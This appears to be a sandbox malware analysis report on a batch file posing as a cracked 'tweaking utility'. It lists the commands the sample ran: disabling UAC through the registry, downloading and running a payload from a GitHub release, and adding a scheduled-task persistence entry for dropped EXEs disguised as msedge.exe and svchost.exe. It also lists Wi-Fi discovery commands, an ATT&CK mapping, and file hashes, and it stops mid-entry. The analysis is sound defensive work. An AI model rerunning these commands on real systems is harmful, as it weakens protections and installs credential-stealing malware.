  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=3172,i,8889534879059853095,4469573385010607880,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6016 /prefetch:1
  2⤵
  PID:232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5800,i,8889534879059853095,4469573385010607880,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5040 /prefetch:1
  2⤵
  PID:4612
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=6036,i,8889534879059853095,4469573385010607880,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5880 /prefetch:1
  2⤵
  PID:3504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=5312,i,8889534879059853095,4469573385010607880,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3488 /prefetch:1
  2⤵
  PID:4224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5792,i,8889534879059853095,4469573385010607880,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5760 /prefetch:1
  2⤵
  PID:1892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6044,i,8889534879059853095,4469573385010607880,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5712 /prefetch:8
  2⤵
  - NTFS ADS
  PID:1900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\EXM_Premium_Tweaking_Utility_1.0_Cracked.bat" "
  2⤵
  PID:540
- - C:\Windows\system32\reg.exe
    Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "RPSessionInterval" /f
    3⤵
    PID:4272
- - C:\Windows\system32\reg.exe
    Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "DisableConfig" /f
    3⤵
    PID:1472
- - C:\Windows\system32\reg.exe
    Reg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f
    3⤵
    PID:5048
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3584
- - C:\Windows\system32\reg.exe
    Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f
    3⤵
    - UAC bypass
    PID:2144
- - C:\Windows\system32\reg.exe
    Reg.exe add "HKCU\CONSOLE" /v "VirtualTerminalLevel" /t REG_DWORD /d "1" /f
    3⤵
    PID:3648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic path Win32_UserAccount where name="Admin" get sid | findstr "S-"
    3⤵
    PID:1724
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path Win32_UserAccount where name="Admin" get sid
      4⤵
      PID:2540
  - - C:\Windows\system32\findstr.exe
      findstr "S-"
      4⤵
      PID:4040
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:4460
- - C:\Windows\system32\chcp.com
    chcp 437
    3⤵
    PID:2412
- - C:\Windows\system32\curl.exe
    curl -g -k -L -# -o "C:\Users\Admin\AppData\Local\Temp\exm.zip" "https://github.com/anonyketa/EXM-Tweaking-Utility-Premium/releases/download/V1.0/exm.zip"
    3⤵
    PID:1040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoProfile Expand-Archive 'C:\Users\Admin\AppData\Local\Temp\exm.zip' -DestinationPath 'C:\Exm\'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3584
- - C:\exm\EXMservice.exe
    EXMservice.exe
    3⤵
    - Executes dropped EXE
    PID:2104
  - - C:\Users\Admin\msedge.exe
      "C:\Users\Admin\msedge.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      PID:3880
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2376
  - - C:\Users\Admin\svchost.exe
      "C:\Users\Admin\svchost.exe"
      4⤵
      Executes dropped EXE
      Drops desktop.ini file(s)
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:2816
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:2968
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2380
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profile
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1740
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr All
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1344
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4996
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4068
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show networks mode=bssid
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:3532
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:2124
- - C:\Windows\system32\chcp.com
    chcp 437
    3⤵
    PID:2432
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "& {Get-AppxPackage *Microsoft.BingWeather* | Remove-AppxPackage}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3408
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:3972
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "& {Get-AppxPackage *Microsoft.GetHelp* | Remove-AppxPackage}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1680
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:4332
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "& {Get-AppxPackage *Microsoft.Getstarted* | Remove-AppxPackage}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1708
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:2956
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "& {Get-AppxPackage *Microsoft.Messaging* | Remove-AppxPackage}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4220
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:2672
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "& {Get-AppxPackage *Microsoft.Microsoft3DViewer* | Remove-AppxPackage}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4520
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:1816
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "& {Get-AppxPackage *Microsoft.MicrosoftSolitaireCollection* | Remove-AppxPackage}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2332
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:3600
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "& {Get-AppxPackage *Microsoft.MicrosoftStickyNotes* | Remove-AppxPackage}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3104
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:1292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "& {Get-AppxPackage *Microsoft.MixedReality.Portal* | Remove-AppxPackage}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3872
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:2652
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "& {Get-AppxPackage *Microsoft.OneConnect* | Remove-AppxPackage}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1184
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:2732
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "& {Get-AppxPackage *Microsoft.People* | Remove-AppxPackage}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4456
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:2756
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "& {Get-AppxPackage *Microsoft.Print3D* | Remove-AppxPackage}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2420
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:3144
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "& {Get-AppxPackage *Microsoft.SkypeApp* | Remove-AppxPackage}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:408
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:3508
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "& {Get-AppxPackage *Microsoft.WindowsAlarms* | Remove-AppxPackage}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1900
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "& {Get-AppxPackage *Microsoft.WindowsCamera* | Remove-AppxPackage}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2804
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:5076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "& {Get-AppxPackage *microsoft.windowscommunicationsapps* | Remove-AppxPackage}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2656
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:1728
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "& {Get-AppxPackage *Microsoft.WindowsMaps* | Remove-AppxPackage}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4516
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:1580
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "& {Get-AppxPackage *Microsoft.WindowsFeedbackHub* | Remove-AppxPackage}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4580
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:1992
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "& {Get-AppxPackage *Microsoft.WindowsSoundRecorder* | Remove-AppxPackage}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:440
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:3276
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "& {Get-AppxPackage *Microsoft.YourPhone* | Remove-AppxPackage}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2752
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:1828
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "& {Get-AppxPackage *Microsoft.ZuneMusic* | Remove-AppxPackage}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1648
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:3420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "& {Get-AppxPackage *Microsoft.HEIFImageExtension* | Remove-AppxPackage}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3916
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:1932
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "& {Get-AppxPackage *Microsoft.WebMediaExtensions* | Remove-AppxPackage}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4000
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:4668
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "& {Get-AppxPackage *Microsoft.WebpImageExtension* | Remove-AppxPackage}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2512
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:3364
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "& {Get-AppxPackage *Microsoft.3dBuilder* | Remove-AppxPackage}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2220
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:1400
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -Command "Get-AppxPackage -allusers *bing* | Remove-AppxPackage"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:276
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:488
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -Command "Get-AppxPackage -allusers *bingfinance* | Remove-AppxPackage"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4908
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:2932
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -Command "Get-AppxPackage -allusers *bingsports* | Remove-AppxPackage"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4728
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:1972
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:492
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -Command "Get-AppxPackage -allusers *CommsPhone* | Remove-AppxPackage"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1576
- - C:\Windows\system32\timeout.exe
    timeout /t 1 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:3360
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -Command "Get-AppxPackage -allusers *Drawboard PDF* | Remove-AppxPackage"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1896

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4928

C:\Users\Admin\AppData\Local\msedge.exe
C:\Users\Admin\AppData\Local\msedge.exe
1⤵
- Executes dropped EXE
PID:4596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\3a75855554d81410fa242a9398eda7a2\msgid.dat

Filesize
5B

MD5
9ea89671c9ac8a9c53062381b303f4d4

SHA1
63a65bab4d13df49e5195f8c8f940adee5b61470

SHA256
87c1eb62960bbed0d512a431c137f9f17c7ab0ba533d20e2616eef77f03b7bda

SHA512
1027b21280243f5073e255d653c71bdc0cb0111c07f31e54d5f4145be830430cce3fcf64acee4b6a817fcd7a44faa799b0e42eba8adbec6ae0147e81c3486f37

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
31a1f54eade6d029b4835a0f28799f91

SHA1
6cb01cbb2eec30ee597fa65c5a8d59bef9661e12

SHA256
432e086fb4baf34eec2272f23044dc0f722d39ecb6aba090120e57fcae6fca09

SHA512
9fbb47f74890cac2ae3c80892248fc658af8a82018ec36c6ebc629abe81c9d12913a88011d9275e4bfec8e2d350048f6508240a5e4ae6450fef39ed2bade13b2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000016

Filesize
213KB

MD5
f942900ff0a10f251d338c612c456948

SHA1
4a283d3c8f3dc491e43c430d97c3489ee7a3d320

SHA256
38b76a54655aff71271a9ad376ac17f20187abd581bf5aced69ccde0fe6e2fd6

SHA512
9b393ce73598ed1997d28ceeddb23491a4d986c337984878ebb0ae06019e30ea77448d375d3d6563c774856d6bc98ee3ca0e0ba88ea5769a451a5e814f6ddb41

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
984B

MD5
6b37b4bc7b3955ffa8262406615b9ac0

SHA1
86f58a1aafdfa04704bc308fcd2bbc1eba694761

SHA256
8b589aa62cea76ee44e9aeaf38f698434aae496c92e7d2671d561cbb343ff593

SHA512
efaa64a574564fcfe9db5d6e93d1b6f70f009f7979335495ccc4f6fa8e6b3851377fac650b497c13b8aecf9a4e7b11d9621d2d2d617aaf2d11ab5fa3d7888f83

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

Filesize
264KB

MD5
419cda86e8851dba1344b9900756bff7

SHA1
7896eaad528a8d8a7b4b92b26bfb97b72573ef96

SHA256
3667e0c858fba44f413b953b8f0cfdc98f172fdc5603493e66c6ed973f7541a9

SHA512
12c12c997291fc55e54524cb603abfebc0717c97326f1026c716e375ee668f3c64d55b1b25de7759992e22fff6f08a708741fbcc7c85d16d9af9df1126d4242c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History

Filesize
192KB

MD5
69e6be98f7e690ebf2e7e6686d14adac

SHA1
686f84df0eda072a779d401a90a98f226429afde

SHA256
f38ef36463208b52d14c916a59dd06e490f16fb5036dcc15adb166486e8baf83

SHA512
d9e05e7fce788eeb7957b26c51a00bddaf4a7c5183582ded3611e412a1522803afd3844d6cb3d4dc1c3b90b49b803e4d3c5426c900fffd49a9e8b1c15715b2ac

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
0309747c89898dd25a953e865aa4b5bf

SHA1
9365066d448e28ad4cc2e0a4ba110c717984e830

SHA256
20ea42dbcd4de894fc46522723fe094b23405a51e9323bc59b9f6cabb8ea21b1

SHA512
824856a44b6466a2b0ec45b45864e9069441e2b6397518c895ebd714fd2bbb01815310ffe5bd9c8ca4eb6fd8e085851c23e9a5beaf8ada5dcb083e13d2290d04

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
14KB

MD5
c62a9207e5a917287d7d3b4f95dea2a6

SHA1
b97825a2321118ba5d361ba525c8217aa5f6a584

SHA256
9abc5deb71c6189d61e937eb9a44211d83722f41b5da1f2905ed66a4d676585e

SHA512
5ad043e4ab0729b26c5b3468dffef0e01e7c4826db6c9f8f82cda1f6fe0dfcfe6e24a10d2f19901035e01d60db855d78d9e3f78ebdd2c2c119aeb7dd36b5555e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
49f3e34873f6d78a95707d89f3cdbf07

SHA1
a0076321ae95758a6c069d78e366cf37f55403de

SHA256
a1e3a940af148fd1808e2c81f47c97270f618abcf83c96e8f361ecf0ab84a579

SHA512
4a4cb38eb9b182cfbf953e14fb377fbcd631f4ec9c8e29cb84c5ef1799036334826989f1a9d9fdf96c55a41fccb415ff141480b8a7a91a2217d6f9762eba38e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
7072a03491bb7550ddedec619c7846db

SHA1
addbe116678af973700fe07168d1f5760078f2bb

SHA256
e50f096d5b2aeb61bfe9d58648b0f579a785c3c8187f76a2bdf6651810724969

SHA512
bf2ad0db4678fe08ed1643d7b54dccc26f123e63287d0d251d2b49b3672ef816623303df21083450333f2b5b1555247056fd4a14d498c2e447c40d0fac3ff309

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
811355e7d1f37f29f95cbe4bf3ca9746

SHA1
a9ec39b760c6c7670aa6a632976f424862ecb9f3

SHA256
79f582d2257f43c0f93969c29471538e8f9d06057bba3ad8813b7a92e91f7fdc

SHA512
a9b51f210940f755408757ee63aed29ad9f68f84684a7f25f5db11acabfa0863f8e350bacef114acb519b031f0eb69167a990fd7b8fa90c4ed4c2212a1351577

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
59ab09c620540b72794fd3d0b3e317b2

SHA1
3b5004864c18743c56aa98cb82514f3cdfa633c7

SHA256
82a695792efcb924d42fc6381b96dd2394810ac8f629953e8540716e81b4ff9a

SHA512
6e3a9b56a217d6de286ee51a725661264b4804834e416d9c3e4f8e1dbe8c6514f63c122a70fb679e0aaf85751a01b0dd7a4553baa6e4719397eab6465599471b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
f6b6056812cef62b29db5f77020810e3

SHA1
a5930067d60f8dc2c6bc6741f60b34b638261794

SHA256
639508bf805e6a22fdb147174f781b1e4aa4e150ab8b2e9133ab8b5077f45274

SHA512
bfdfc227196d88330afcbffc1c3f7aa37a1e5c259773df02b41c27672dd11ff4abb01499da250b2c97656a5e9464d4c6127ed96213f4063a307372642a79bf82

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
60d5effed6ce8ea500f0416ae52459a8

SHA1
7ce973fce093016eb4c47bfca3ee946cb545bc0a

SHA256
96ec81a5b20d0bf0cd9c7c56ea04074ef28b950e12a99a7715af5bb208fa49fe

SHA512
1cb1ede14170272a9b591da7438b98fc8443a5ac6885d898891b84683985a12a2288686797c38eb853f2f0583f13af7e2aa15e3e4dfa9908c487a310306f7f52

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
e54e67d4e5d80a798047bb9809c799c2

SHA1
24e606e0b2f41b126dd9c27034906c41cf8f8ccb

SHA256
ca04440eb7cc0613a4aeaee1a41cd41e82d468a028c3749978b9a22a45417212

SHA512
bd8b4ccb9f200412d8a73a82579532faa8c0525837a07caab89acec1eaedeb54d19b18cef6bf90bf0ea10706d1e54a48cc0ba491d715f0da24dfaa76479ebad3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
7e3331a9446d5b011bc62606fe99fc00

SHA1
bd23f54b070e9e72588c5c1d1641de9a7c19c3e3

SHA256
716fdee329f364aced738b8f4dc29f29ac193d707e18a40a21cf1b079e1d254e

SHA512
806db8e4440e2262112a26e244845c14ab5b303bc9ceddbc65fdad656bcdb1c1ac3b1bd18ae8565e101d6f3ad2d46b744bcb86d4befce2f7bd89d3593a57ea8d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\7a7900728ee0d4f5a270f7a3f0e134839df593ed\d80e7337-dba4-416b-a66e-f53e7c5dfbfa\index-dir\the-real-index

Filesize
72B

MD5
73a951c7db186a781df27abffdf1bef7

SHA1
def1d66159f82b68aaa5fdc1c1b824580c086e5c

SHA256
bce7d14fdae2fc4d335cfaed33da4465919da80342143296b98ddff003b72bb2

SHA512
febceebf8f8cc4dcbd60f9e905dd9dc75f85de4029cea3dbba7e30feb2170ff658cdcd6c7aa16b269108964b0a8a8849bb94e1c1ea94af7b292c76549b09b0cb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\7a7900728ee0d4f5a270f7a3f0e134839df593ed\d80e7337-dba4-416b-a66e-f53e7c5dfbfa\index-dir\the-real-index~RFe57fe07.TMP

Filesize
48B

MD5
f0322f77ec40a69fcd406add619b13d8

SHA1
360d03ea431c9bd2d96a1fe882c2153aa18f7753

SHA256
6d5e0affa7a4f7e20c48ec268e105a6e58e6cdf94afadf76016294df05f33043

SHA512
2291d142010c6a387f83a8cd3220f4c43dbd7bbcfa69badffcc3a250751f9f5b48113361a1b1252e03c046f372a88344f18414861c7fb64c6c1c356081d800a9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\7a7900728ee0d4f5a270f7a3f0e134839df593ed\index.txt

Filesize
136B

MD5
bf60e800e5828cb520c1ec17cc6ce06c

SHA1
8ba8a9c5e70d277ac6dfe3e1201b44e855d5e37d

SHA256
